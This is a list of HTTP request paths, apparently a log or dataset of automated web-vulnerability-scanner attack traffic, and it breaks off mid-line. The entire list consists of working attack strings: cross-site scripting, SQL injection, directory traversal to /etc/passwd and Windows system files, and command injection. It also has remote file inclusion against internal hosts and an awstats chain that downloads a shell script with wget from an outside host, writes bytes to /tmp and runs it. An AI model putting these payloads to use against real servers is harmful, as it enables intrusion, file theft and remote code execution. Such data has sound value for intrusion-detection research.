#\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/whmch8ftkt7kv??\n/main.php?stuff=\"ver\\x0b>q67582951&rem\\x0b\n/sitescope/cgi/go.exe/sitescope?account=administrator&logname=system&machine=&page=eventlog\n/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_bjmml9oq]));die;/*\n/en-us/account/demos/demo.browse.php?filename=/etc/passwd\n/jdx255ea.mscgi?<script>document.cookie=\"testziyq=5055;\"</script>\n/javascript/openjpa.exe\n/subscript/\n/phpmyadmin/zpanel.php?page=/etc/passwd\\x00\n/en-us/account/source?v=../../../../../../../../../../etc/passwd\\x00\n/main.php?logout=\"del\\x0bq77294234&rem\\x0b\n/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/ghl9il??cmd=id;pwd\n/examples/jsp/sessions/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/examples/jsp/checkbox/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+rcx>>ctdn\n/javascript/.passwd.png\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/cbpxmnuvtn.sh;echo|awstats233118.txt\n/help.php?q=\"ping -w 10000 -n 1 1.2.3.4&rem \n//..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/qb2xy9aw.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0duname\\x09#\n/examples/jsp/jsp2/el/fxm.exe\n/scripts/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/profile.php?author_id='414156083542\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/examples/jsp/checkbox/index.php?user_langue=../../../../../../../../../../etc/passwd\n/82q7ywa8.exe?<script>document.cookie=\"testpwew=1315;\"</script>\n/javascript/passwords.exe\n/recordings/check_user_id.php?user_id=<script>foo</script>\n/help.php?q=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/admin/index.php?msg=1&username=\"><script>alert(410686083385)</script><\"\n/<script>foo</script>\n/main.php?logout=\"&ver,>q91889862&rem,\n/dda2qr7j.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/main.php?stuff=\";del\\x09q74362376\\x09#\n/main.php?stuff='\\x0duname\\x09#\n/main.php?logout=\"\\x0asleep\\x097\\x09#\n/description/\n/5o9zq43e.x?<script>cross_site_scripting.nasl</script>\n/scripts/sdbsearch.cgi?stichwort=anything\n/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/no4ghqiguzhst?'\n/1qwv2p5p.aspx?<script>document.cookie=\"testvqcy=252;\"</script>\n/weq93ppb.htm?<script>cross_site_scripting.nasl</script>\n/j734qobz.cfc?<script>cross_site_scripting.nasl</script>\n/ghswfouu.exe?<script>document.cookie=\"testsqmm=5713;\"</script>\n/examples/jsp/num/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/scripts/ggvfa_wichxq.php\n/qhvu0pdg.kspx?<script>document.cookie=\"testchuc=2100;\"</script>\n/conscript/\n/main.php?logout=&uname\\x09>q12279742\\x09#\n/top.php?stuff=\"&rm;q13316957&rem;\n/fa8p8lr8.php?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='&sleep 10 #\n/admin/htmlarea/popups/file/files.php?q=<script>alert('wvs-xss-magic-string-414216083544')</script>&mode=apparel\n/examples/jsp/jsp2/jspx/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/scripts/tinfo.php?id=1331918989\n/main.php?logout='rm\\x09q24187781\\x09#\n<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/scripts/c0kha6w3apd3.php3\n/vwmg565s.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/<script>cross_site_scripting.nasl</script>.cgi\n/<meta http-equiv=set-cookie content=\"testfosd=94\">\n/u95h6ymu.asp?<script>document.cookie=\"testkhwc=4028;\"</script>\n/script//ident/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/cgi-perl/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/manager/core/editor.php?editor_insert_bottom=/etc/passwd\n/virus-bursters.exe/\n/javascript/framework.exe\n/script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/j4drbkil.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/igtf0zon.html?<script>cross_site_scripting.nasl</script>\n/recordings/ovlaunch.exe\n/top.php?stuff=\"&ver;>q13316957&rem;\n/ht8pn8uq.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/calendar.php?serverpath=/etc/passwd\\x00\n/iisadmpwd/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q=ver\\x0b>q84117889&rem\\x0b\n/cytherea's lipstick lesbians/\n/82q7ywa8.idc?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/hrttz9fj.jsp?<script>document.cookie=\"testtbjy=7334;\"</script>\n/o35zot2r.htm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"rm\\x0cq31638645&rem\\x0c\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/btnvlgnsgo;\"\n/top.php?stuff=\"del\\x0cq81327195&rem\\x0c\n/scripts/gdxlwjnlsr6i.inc\n/bxnyrhmh.dll?<script>document.cookie=\"testmjct=1867;\"</script>\n/top.php?stuff=&ver\\x0c>q57775181&rem\\x0c\n/examples/jsp/jsp2/el/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/odipkt_description/\n/examples/jsp/sessions/kb.cgi?view='&lang=en\n/transcript_list/\n/cgi-bin/htsearch?exclude=`/etc/passwd`\n/archive.php?scriptpath=http://cirt.net/rfiinc.txt??\n/examples/jsp/jsp2/jspx/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\\x00\n/transcript_gates/\n/forum-ra_professionnel.asp?n=`/etc/passwd`\n/examples/jsp/sessions/profil.php?id=1 <script>foo</script>\n/news/include/createdb.php?langfile;=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/m5103snj.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/main.php?stuff=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/blake's notebook/\n/vwmg565s.php?<script>cross_site_scripting.nasl</script>\n/en-us/account/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/trackers.exe\n/examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/zqqemp6j.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/config.php?path[docroot]=/etc/passwd\\x00\n/top.php?stuff=\";uname #\n/pxagj7n7.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awsegghnxp7katggbebfod2cnizwaa/lcqujjmwty.sh;echo|awstats726723.txt\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='123258797\n/config.php?returnpath=/etc/passwd\\x00\n/en-us/<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/num/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/javascript/example.exe\n/javascript/playlist.exe\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=q25861218&scr_width=\n/um7xpn15.kspx?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/bl8sefdm.pl?<script>cross_site_scripting.nasl</script>\n/javascript/index_2.exe\n/examples/jsp/cal/sawmillcl.exe?ho+{complete_version}\n/33y9gcqq.htm?<script>document.cookie=\"testnvxc=4301;\"</script>\n/help.php?q=\"&rm\\x0bq72412482&rem\\x0b\n/top.php?stuff=ver\\x0c>q95318168&rem\\x0c\n/j4rdyhw8.nsf?<script>document.cookie=\"testrluj=1420;\"</script>\n/recordings/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/ghl9il?&\n/nsn/..\\util/copy.bas\n/eg2u8pbv.pl?<script>cross_site_scripting.nasl</script>\n/cgi-bin/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/1qwv2p5p.nsf?<script>document.cookie=\"testvqcy=252;\"</script>\n/javascript/kids.exe\n/main.php?stuff=\"\\x0ddel\\x09q16681283\\x09#\n/3hlysl2x.nsf?<script>document.cookie=\"testgjbe=8505;\"</script>\n/help.php?q=';sleep\\x0910\\x09#\n/scripts/viewcvs.cgi/\n/bzuf9ozq.mscgi?<script>cross_site_scripting.nasl</script>\n/6n7aacgg.htm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=ping;-w;9000;-n;1;4.3.2.1&rem;\n/a0imiuf1.asp?<script>document.cookie=\"testxqrn=4654;\"</script>\n/counterscript/\n/help.php?q=\"rm;q24461998&rem;\n/javascript/document.asmx\n/login.asp?sessionid=[\">><script>alert(\"414286083571\");</script>\n/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd\n/eei78ore.cfm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/miz4r5hz.dll?<script>document.cookie=\"testviqu=1270;\"</script>\n/nuh3zirz.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0adel q61886362 #\n/tuwjta1w.exe?<script>document.cookie=\"testpokn=7494;\"</script>\n/help.php?q=\"&uname >q34212187 #\n/submitmanuscript/\n/v3axg1p8.nsf?<script>document.cookie=\"testxagh=6987;\"</script>\n/help.php?q=\"&rm\\x0bq26193259&rem\\x0b\n/examples/servlets/servlet/wa.exe?debug-show-version\n/examples/jsp/jsp2/jspx/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/javascript/service.exe\n/<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/examples/jsp/error/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/search.jsp?q=%\"<script>alert(1331904374)</script>\n/..\\xc0\\xaf/host-manager/html\n/h5i6crm3.cfc?<script>document.cookie=\"testlihk=7070;\"</script>\n/top.php?stuff=\"|sleep 9 #\n/scripts/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+28+30+00+00+00+00++>>ctdn\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1284503405--\n/scripts/cpshost.dll\n/scripts/sitemap.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt?\n/zroo33l4.cgi?<script>document.cookie=\"testiklc=904;\"</script>\n/file_passwd/\n/servlet/webacc?user.html=../../../../../../../../../../../../../../../../../../etc/passwd\\x00\n/javascript/document.c\n/scripts/wsasp.dll/wservice=wsbroker1/webutil/ping.p\n/scripts/bpk_bsfe_4vq.php\n/help.php?q=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/phpmyadmin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/help.php?q=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl??\n/vwmg565s.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/javascript/tutorials.exe\n/nuh3zirz.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/language.php?data_dir=/etc/passwd\\x00\n/b5xdqgz2.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/store.php?crn=42'&action=show&show_products_mode=cat_click\n/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cacti/sendcard.php?view=1&id='sendcard_sql.nasl\n/examples/jsp/checkbox/js/scripts.php?load=/etc/passwd\\x00\n/cgiscripts/\n/examples/jsp/checkbox/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/starnet/addons/slideshow_full.php?album_name='936668697\n/index.php?show=/etc/passwd\n/scripts/bveygnpo6hkw.shtml\n/u95h6ymu.php?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/javascript/.passwd.csv\n/javascript/layout.exe\n/examples/jsp/error/remindpasswd\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- \n/javascript/document.ini\n/main.php?logout=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/l4fz1dqw.asp?<script>cross_site_scripting.nasl</script>\n/phpmyadmin//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\n/scripts/?.jsp\n/rpxyx07v.do?<script>document.cookie=\"testbnli=1975;\"</script>\n/opinion.exe\n/javascript/node.exe\n/l4fz1dqw.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/setcookie.php?u=../../../../../../../../../../etc/passwd\\x00\n/recordings/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\\x00\n/ewc3rz1l.html?<script>document.cookie=\"testkgqo=204;\"</script>\n/scripts/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/javascript/weblogic.exe\n/ybz5rz7a.nsf?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/examples/jsp/num/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/top.php?stuff=\"del;q52915956&rem;\n/comments.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??\n/scripts/callboth.php?seq=654321&out=123456&in=1332009306@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/examples/jsp/error/mlog.html?screen=/etc/passwd\n/en-us/h5sc3gxy.do?<script>cross_site_scripting.nasl</script>\n/oie504mr.html?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/zz5thkvtmlgl?\n/top.php?stuff=\"|ping,-w,9000,-n,1,4.3.2.1|rem,\n/openview5.exe?target=main&action=../../../../../../../../../..//winnt/win.ini\n/en-us/oie504mr.html?<script>document.cookie=\"testtpby=7052;\"</script>\n/help.php?q=\"&ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/rpc/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/m2fpztty.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testwtbo=4831;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+ver+>>ctdn\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/gjehhrjnrx0;echo|awstats214256.txt\n/en-us/s7qus4g3.asp?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=q83452335&scr_height=&scr_width=\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+debug<ctdnu>hwgl\n/examples/jsp/error/survey.inc.php?path=/etc/passwd\\x00\n/x7pclv4s.cfm?<script>document.cookie=\"testiulz=3709;\"</script>\n/boot-scripts/\n/oie504mr.idc?<script>document.cookie=\"testtpby=7052;\"</script>\n/fcgi-bin/echo2?foo=<script>alert('vulnerable')</script>\n/jw64yq8u.cgi?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/scripting/\n/<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/login?user=**<script>javascript:alert('cpanel_login_user_xss.nasl');</script>\n/en-us/account/phpnews/sendtofriend.php?mid='1'\n/examples/jsp/checkbox/wiki.php/<script>foo</script>\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908730,1,1,1,1,1,1,1--&blogid=1\n/cgi-915/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/0u75ldxq.dll?<script>cross_site_scripting.nasl</script>\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/2aibfaczmac8??&cmd=id\n/fa8p8lr8.idc?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --\n/examples/jsp/cal/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/gallery_script/\n/examples/jsp/colors/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/y8pmygrp.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;/./tmp/gjehhrjnrx0 > /dev/null &;echo|awstats741931.txt\n/bn857frh.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgis/ppdscgi.exe\n/main.php?stuff=\"&ver,>q13326619&rem,\n/abuso dell'hardware nell'attacco al kernel di linux/\n/javascript/stock.exe\n/cgi-sys/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/examples/jsp/checkbox/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/help_subscription/\n/scripts/search.php?getdate=./templates/default/admin.tpl\n/ht8pn8uq.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-local/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/boilerplate.asp?nfuse_currentfolder=/&nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini\n/ht8pn8uq.fts?<script>cross_site_scripting.nasl</script>\n/en-us/dda2qr7j.mscgi?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';del q56884429 #\n/phpmyadmin/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/javascript/audits.exe\n/n1afe1y6.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jujgxwav.cgi?<script>document.cookie=\"testknim=9383;\"</script>\n/n1afe1y6.do?<script>cross_site_scripting.nasl</script>\n/scripts/pssdseehtgdp.php\n/javascript/performance.exe\n/0z575z74.php3?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/en-us/account/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/help.php?q='&uname\\x09>q78257168\\x09#\n/examples/jsp/jsp2/jspx/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/modules.php?name=classifieds&op=viewads&id_subcatg=75&id_catg=<script>alert('vulnerable')</script>\n/javascript/nsf.exe\n/de3v2dd9.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.inc.php?pathtoscript=http://192.168.202.118:8080/ghl9il?\n/cgi-home/ion-p.exe?page=c:\\winnt\\repair\\sam\n/examples/jsp/cal/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/help.php?q=\"&ver&rem\\x0c\n/javascript/.passwd.yml\n/vhzmaia2.fts?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/fa8p8lr8.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ver\\x0b>q12574322&rem\\x0b\n/scripts/index.php?id=s1_eihg6e1'\n<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/examples/jsp/jsp2/el/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/javascript/compat.exe\n/examples/jsp/sessions/search.pl?form=../../../../../../etc/passwd\\x00\n/bxnyrhmh.aspx?<script>document.cookie=\"testmjct=1867;\"</script>\n/cgi-perl/ion-p?page=../../../../../etc/passwd\n/copatranscript_20061102/\n/main.php?logout=\"ping;-w;11000;-n;1;4.3.2.1|rem;\n/examples/servlets/servlet/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/main.php?logout=\"del;q97754931&rem;\n/if69ddo1.aspx?<script>document.cookie=\"testiabz=5220;\"</script>\n/cacti/webdist.cgi?distloc=;id\n/top.php?stuff=\"del\\xa0q69465625&rem\\xa0\n/examples/jsp/sessions/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/b4vng02k.cfc?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/manager/newsdesk.cgi?t=../../../../../../etc/passwd\n/m5103snj.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/way-board/way-board.cgi?db=/etc/passwd\\x00\n/javascript/document.pem\n/en-us/oie504mr.mscgi?<script>document.cookie=\"testtpby=7052;\"</script>\n/htbin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/top.php?stuff=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/uc3w3bdi.do?<script>document.cookie=\"testxllt=9940;\"</script>\n/copying/</p><body><script src=http://www.example.com/test?rnd=q11971667></script><p>\n/rpxyx07v.jspa?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/index.php?id=egyb16sayu'\n/main.php?logout=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/examples/jsp/cal/cal_week.php?op=week&catview=999'\n/hjdzm96v.php3?<script>document.cookie=\"testbyqe=7474;\"</script>\n/javascript/.htpasswd.sfish/''''\"\"\"\"\n/javascript/jhtml.exe\n/miz4r5hz.idc?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.cfc\n/perl_scripts/\n/help.php?q=\";uname\\x09>q32988845\\x09#\n/en-us/account/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/help.php?q=\"|ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/vimscriptlinks/\n/javascript/binary.exe\n/main.php?logout=\"&del,q76194966&rem,\n/9o6g5vkn.exe?<script>cross_site_scripting.nasl</script>\n/<script>cross_site_scripting.nasl</script>.html\n/scripts/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/everything's just wonderful/\n/weq93ppb.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&ping -w 11000 -n 1 1.2.3.4&rem \n/javascript/.passwd.temp\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919198\n/examples/jsp/jsp2/jspx/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/scripts/piywzua5hwer.html\n/byrg33fw.php3?<script>document.cookie=\"testexuu=5340;\"</script>\n/\\\"><img src=\\\"javascript:alert(document.domain)\\\">\n/cgi-bin/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/t578vqea.aspx?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/en-us/<script>cross_site_scripting.nasl</script>.asp\n/help.php?q=&ver >q48647675&rem \n/en-us/dda2qr7j.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?id='union/**/select/**/0,0,616656011,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/apavxugx.cfc?<script>document.cookie=\"testdnbh=5237;\"</script>\n/scripts/calendar.php?month=' union select 1,1,'1331909175','calendarix_month_sql_injection.nasl',1 #\n/comments.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??\n/main.php?logout=\"\\x0ddel\\x09q59885581\\x09#\n/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd\n/examples/jsp/colors/admin/admin.php?sid=0'\n/scripts/vhost.php?action=logout&time=1331908669\n/i2n4v4rl.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/.history.exe\n/g3w7y7u5.php3?<script>document.cookie=\"testbfpq=3326;\"</script>\n/0u75ldxq.idc?<script>cross_site_scripting.nasl</script>\n/$sitebase/redcell/phonehome_script.exe\n/phpmyadmin/1'\n/javascript/.htaccess/-->\">'>'\"<sfi000012v868621>\n/main.php?logout=\"ver\\x0b>q22255946&rem\\x0b\n/nmw0do67.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"uname >q96673282 #\n/javascript/tail.exe\n/help.php?q=\"rm q98145633&rem \n/examples/jsp/error/index.php?chemin=../../../../../../..//etc\n/javascript/adv.exe\n/manager/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/scripts/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://xxxxxxxxxx/\n/j734qobz.mscgi?<script>cross_site_scripting.nasl</script>\n/javascript/webwork.exe\n/3j8echh0.fts?<script>document.cookie=\"testfuqi=4189;\"</script>\n/examples/jsp/colors/install.php?newlang=../../cpg_error.log\\x00\n/scripts/boarddata/data/user.idx\n/redirection_scripts/\n/main.php?frm_daynight=day&frm_passwd=q15634621&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=\n/u95h6ymu.jsp?<script>document.cookie=\"testkhwc=4028;\"</script>\n/eesubscription/\n/search.jsp?q=%\"<script>alert(1332008604)</script>\n/nsn/..\\web/fdir.bas\n/pxagj7n7.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/cgi-perl/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/bin/vssetcookie.exe\n/examples/servlets/servlet/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/ows-bin/gw5/gwweb.exe?help=bad-request\n/help.php?q='\\x0arm q19373947 #\n/examples/jsp/sessions/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n//\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xae\\xc0\\xaeetc/passwd\n/vmi8bb12.mscgi?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/0z575z74.mscgi?<script>document.cookie=\"testuhsv=9753;\"</script>\n/examples/servlets/servlet/port.php?proto=tcp'\n/main.php?stuff=\"rm q73888727&rem \n/examples/jsp/sessions/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/scripts/index.php?id=b6q5w0grm_'\n/cgi-bin/../../../../../../../winnt/system32/ping.exe 127.0.0.1\n/examples/jsp/error/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/cacti/index.php?id='union/**/select/**/0,0,1448356578,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/main.php?logout='&del\\x09q79227952\\x09#\n/cgi-bin/popup.php?include_path=/etc/passwd\\x00\n/mailman/options/yourlist?language=en&email=&lt;script&gt;alert('vulnerable')&lt;/script&gt;\n/main.php?stuff=ver;>q27761754&rem;\n/cacti/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/examples/jsp/source.jsp?../../../../system/autoexec.ncf\n/g3w7y7u5.cfm?<meta http-equiv=set-cookie 